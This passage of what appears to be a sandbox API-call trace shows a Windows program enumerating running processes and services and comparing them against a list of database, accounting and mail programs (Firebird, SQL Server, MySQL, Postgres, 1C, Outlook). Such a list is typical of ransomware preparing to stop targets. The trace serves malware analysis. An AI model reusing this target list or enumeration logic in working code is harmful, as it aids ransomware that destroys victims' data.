cntThreads=0x13, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0268.968] lstrlenW (lpString="svchost.exe") returned 11 [0268.968] Process32NextW (in: hSnapshot=0x3c0, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0268.968] lstrlenW (lpString="svchost.exe") returned 11 [0268.968] Process32NextW (in: hSnapshot=0x3c0, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0268.968] lstrlenW (lpString="audiodg.exe") returned 11 [0268.968] Process32NextW (in: hSnapshot=0x3c0, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0268.969] lstrlenW (lpString="svchost.exe") returned 11 [0268.969] Process32NextW (in: hSnapshot=0x3c0, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0268.969] lstrlenW (lpString="svchost.exe") returned 11 [0268.969] Process32NextW (in: hSnapshot=0x3c0, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x1b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1 [0268.969] lstrlenW (lpString="userinit.exe") returned 12 [0268.969] Process32NextW (in: hSnapshot=0x3c0, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x454, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x340, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0268.970] lstrlenW (lpString="dwm.exe") returned 7 [0268.970] Process32NextW (in: hSnapshot=0x3c0, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x448, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0268.970] lstrlenW (lpString="explorer.exe") returned 12 [0268.970] Process32NextW (in: hSnapshot=0x3c0, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0268.970] lstrlenW (lpString="spoolsv.exe") returned 11 [0268.970] Process32NextW (in: hSnapshot=0x3c0, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0268.970] lstrlenW (lpString="taskhost.exe") returned 12 [0268.970] Process32NextW (in: hSnapshot=0x3c0, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0268.971] lstrlenW (lpString="svchost.exe") returned 11 [0268.971] Process32NextW (in: hSnapshot=0x3c0, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x55c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="MicosoftSearch.exe")) returned 1 [0268.971] lstrlenW (lpString="MicosoftSearch.exe") returned 18 [0268.971] Process32NextW (in: hSnapshot=0x3c0, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x54c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0268.971] lstrlenW (lpString="reader_sl.exe") returned 13 [0268.971] Process32NextW (in: hSnapshot=0x3c0, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x54c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 0 [0268.972] CloseHandle (hObject=0x3c0) returned 1 [0268.972] Sleep (dwMilliseconds=0x1f4) [0269.529] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x47ea330 [0269.548] EnumServicesStatusExW (in: hSCManager=0x47ea330, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0xa7ff44, lpServicesReturned=0xa7ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0xa7ff44, lpServicesReturned=0xa7ff5c, lpResumeHandle=0x0) returned 0 [0269.549] GetLastError () returned 0xea [0269.549] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xd68) returned 0x3dec5a0 [0269.549] EnumServicesStatusExW (in: hSCManager=0x47ea330, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x3dec5a0, cbBufSize=0xd68, pcbBytesNeeded=0xa7ff44, lpServicesReturned=0xa7ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x3dec5a0, pcbBytesNeeded=0xa7ff44, lpServicesReturned=0xa7ff5c, lpResumeHandle=0x0) returned 1 [0269.549] CloseServiceHandle (hSCObject=0x47ea330) returned 1 [0269.549] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0269.549] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0269.549] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0269.549] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0269.549] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0269.549] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0269.549] lstrlenW (lpString="AudioSrv") returned 8 [0269.549] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0269.549] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0269.549] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0269.549] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0269.550] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0269.550] lstrlenW (lpString="BFE") returned 3 [0269.550] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0269.550] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0269.550] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0269.550] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0269.550] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0269.550] lstrlenW (lpString="CryptSvc") returned 8 [0269.550] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0269.550] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0269.550] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0269.550] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0269.550] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0269.550] lstrlenW (lpString="CscService") returned 10 [0269.550] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0269.550] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0269.550] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0269.550] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0269.550] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0269.550] lstrlenW (lpString="DcomLaunch") returned 10 [0269.550] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0269.550] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0269.550] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0269.550] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0269.550] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0269.550] lstrlenW (lpString="Dhcp") returned 4 [0269.550] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0269.550] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0269.550] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0269.550] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0269.550] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0269.550] lstrlenW (lpString="Dnscache") returned 8 [0269.550] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0269.550] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0269.551] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0269.551] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0269.551] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0269.551] lstrlenW (lpString="DPS") returned 3 [0269.551] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0269.551] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0269.551] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0269.551] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0269.551] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0269.551] lstrlenW (lpString="eventlog") returned 8 [0269.551] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0269.551] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0269.551] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0269.551] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0269.551] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0269.551] lstrlenW (lpString="EventSystem") returned 11 [0269.551] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0269.551] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0269.551] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0269.551] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0269.551] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0269.551] lstrlenW (lpString="gpsvc") returned 5 [0269.551] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0269.551] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0269.551] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0269.551] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0269.551] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0269.551] lstrlenW (lpString="LanmanWorkstation") returned 17 [0269.551] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0269.551] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0269.551] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0269.551] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0269.551] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0269.551] lstrlenW (lpString="lmhosts") returned 7 [0269.552] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0269.552] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0269.552] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0269.552] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0269.552] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0269.552] lstrlenW (lpString="MMCSS") returned 5 [0269.552] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0269.552] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0269.552] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0269.552] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0269.552] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0269.552] lstrlenW (lpString="MpsSvc") returned 6 [0269.552] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0269.552] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0269.552] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0269.552] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0269.552] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0269.552] lstrlenW (lpString="NlaSvc") returned 6 [0269.552] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0269.552] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0269.552] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0269.552] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0269.552] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0269.552] lstrlenW (lpString="nsi") returned 3 [0269.552] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0269.552] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0269.552] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0269.552] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0269.552] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0269.552] lstrlenW (lpString="PcaSvc") returned 6 [0269.552] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0269.552] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0269.553] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0269.553] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0269.553] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0269.553] lstrlenW (lpString="PlugPlay") returned 8 [0269.553] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0269.553] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0269.553] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0269.553] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0269.553] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0269.553] lstrlenW (lpString="Power") returned 5 [0269.553] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0269.553] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0269.553] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0269.553] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0269.553] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0269.553] lstrlenW (lpString="ProfSvc") returned 7 [0269.553] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0269.553] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0269.553] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0269.553] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0269.553] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0269.553] lstrlenW (lpString="RpcEptMapper") returned 12 [0269.553] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0269.553] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0269.553] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0269.553] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0269.553] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0269.553] lstrlenW (lpString="RpcSs") returned 5 [0269.553] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0269.553] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0269.554] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0269.554] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0269.554] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0269.554] lstrlenW (lpString="SamSs") returned 5 [0269.554] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0269.554] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0269.554] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0269.554] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0269.554] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0269.554] lstrlenW (lpString="Schedule") returned 8 [0269.554] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0269.554] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0269.554] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0269.554] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0269.554] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0269.554] lstrlenW (lpString="SENS") returned 4 [0269.554] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0269.554] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0269.554] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0269.554] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0269.554] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0269.554] lstrlenW (lpString="ShellHWDetection") returned 16 [0269.554] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0269.554] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0269.554] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0269.554] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0269.554] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0269.554] lstrlenW (lpString="Spooler") returned 7 [0269.554] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0269.554] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0269.554] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0269.554] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0269.555] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0269.555] lstrlenW (lpString="SysMain") returned 7 [0269.555] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0269.555] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0269.555] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0269.555] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0269.555] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0269.555] lstrlenW (lpString="Themes") returned 6 [0269.555] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0269.555] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0269.555] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0269.555] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0269.555] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0269.555] lstrlenW (lpString="TrkWks") returned 6 [0269.555] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1 [0269.555] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1 [0269.555] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1 [0269.555] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1 [0269.555] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1 [0269.555] lstrlenW (lpString="UxSms") returned 5 [0269.555] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0269.555] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0269.555] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0269.555] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0269.555] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0269.555] HeapFree (in: hHeap=0xb00000, dwFlags=0x0, lpMem=0x3dec5a0 | out: hHeap=0xb00000) returned 1 [0269.555] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x388 [0269.557] Process32FirstW (in: hSnapshot=0x388, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0269.557] Process32NextW (in: hSnapshot=0x388, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4c, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0269.557] lstrlenW (lpString="System") returned 6 [0269.557] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0269.557] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0269.557] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0269.557] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0269.557] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0269.557] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0269.557] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0269.557] Process32NextW (in: hSnapshot=0x388, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x10c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0269.557] lstrlenW (lpString="smss.exe") returned 8 [0269.557] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0269.557] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0269.558] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0269.558] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0269.558] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0269.558] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0269.558] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0269.558] Process32NextW (in: hSnapshot=0x388, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x148, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0269.558] lstrlenW (lpString="csrss.exe") returned 9 [0269.558] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0269.558] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0269.558] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0269.558] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0269.558] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0269.558] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0269.558] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0269.559] Process32NextW (in: hSnapshot=0x388, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x148, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0269.559] lstrlenW (lpString="wininit.exe") returned 11 [0269.559] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0269.559] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0269.559] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0269.559] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1 [0269.559] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1 [0269.559] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1 [0269.559] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1 [0269.559] Process32NextW (in: hSnapshot=0x388, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x18c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x178, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0269.559] lstrlenW (lpString="csrss.exe") returned 9 [0269.559] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0269.559] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0269.559] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0269.559] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0269.559] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0269.559] 